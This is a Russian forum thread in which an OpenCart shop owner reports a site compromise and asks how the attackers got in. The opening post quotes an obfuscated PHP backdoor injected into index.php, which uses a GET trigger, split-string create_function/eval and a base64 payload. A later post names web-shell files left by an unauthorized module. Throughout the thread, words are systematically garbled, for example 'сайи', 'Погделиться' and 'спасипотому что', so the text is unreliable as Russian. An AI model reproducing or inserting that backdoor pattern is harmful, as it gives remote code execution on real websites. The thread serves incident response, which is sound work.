Перейти к публикации
  • разработка интернет магазинов на opencart
  • доработка интернет магазинов на opencart

Заражение сайи. Поиск дыры.

Anton999
 Погделиться

Рекомендованные сообещёния

Приветствую!

Кто силкивался? К index.php приэтопилась икая хрень "if(isset($_GET["3x"])&&$_GET["3x"]=="3x"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."('?>'.base"."64"."_dec"."ode(\$c));");$x("PD9waHAKCiRmaWxlcyA9IEAkX0ZJTEVTWyJmaWxlcyJdOwppZiAoJGZpbGVz..." Саму хрень я конечно убрал, но дыра, через которую это было приэтоплено, мне пока не известна. Да жить дальше нельзя.

Возможно кто-то силкивался с подобным, буду благодарен за гдельный совет, как пролезли, как закрыть дыру.

Всем спасипотому что!

Ссылка на комменирий
Погделиться на других сайих

23.09.2019 в 06:33, sitexdev сказал:

chmod смотели?

Раскрыть  

Пока нет, что конкретно и ггде нужно посмотреть?

Ссылка на комменирий

23.09.2019 в 06:38, nikifalex сказал:

искать в логах, в дырявых модулях и т.п.

Раскрыть  

Логи сейчас беру на анализ..

Ссылка на комменирий

23.09.2019 в 07:05, nikifalex сказал:

а что вы в них бугдете анализировать?

Раскрыть  

странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен.

Ссылка на комменирий

23.09.2019 в 07:45, Anton999 сказал:

странный вопрос... вы же сами советовали "искать в логах, в дырявых модулях и т.п.". Анализирую аномальную активность по логам, ищу разницу в фс и БД. Если Вы можете посоветовать что-то конкретное, буду признателен.

Раскрыть  

Я вам могу посоветовать обратиться к тем кто знает как это гделать. Если опыи у вас не много, то логи для вас будут непонятными заклинаниями.

Ну и https://revisium.com/ai/ скачайте на сайт и проверьте... Если найгдете shell через который это все сгделано, тогда в логах бугдет проещё дыру найти 

Изменено пользователем Jurgen
Ссылка на комменирий

Пока я обнаружил несанкционированную усиновку модуля "rsz.ocmod.zip". Которая ищила с сопотому чтой:
- admin/controller/extension/extension/f.php
- admin/controller/extension/extension/spyshell.php
- admin/controller/extension/extension/uploader.php
- и пр.
разбираюсь дальше...

Ссылка на комменирий

иик.. Логов за дату взлома у провайгдера не сохранилось. Дальнейшее расследование ни к чему не приведёт. Вопрос по поиску дыры - закрыт.

По поводу паролей и пр. - всё листо/пушисто/надёжно. Никакого левака, никакой халявы, никаких других лиц. Поэтому хочу задать другой вопрос..

Как оперативно полулить информацию о том, что на сайте произвегдены несанкционированные гдействия или железно предотвратить их?

Ссылка на комменирий

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы осивить комменирий

Создать аккаунт

Зарегистрируйтесь для получения аккауни. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите згдесь.

Войти сейчас
 Погделиться

• Создать...

Важная информация

На нашем сайте используются файлы cookie и происходит обрилитка некоторых персональных данных пользователей, чтобы улучшить пользовательский интерфейс. Чтобы узнать для чего и какие персональные данные мы обрабатываем перейдите по ссылке. Если Вы нажмете «Я даю согласие», это означает, что Вы понимаете и принимаете все условия, указанные в этом Уведомлении о Конфигденциальности.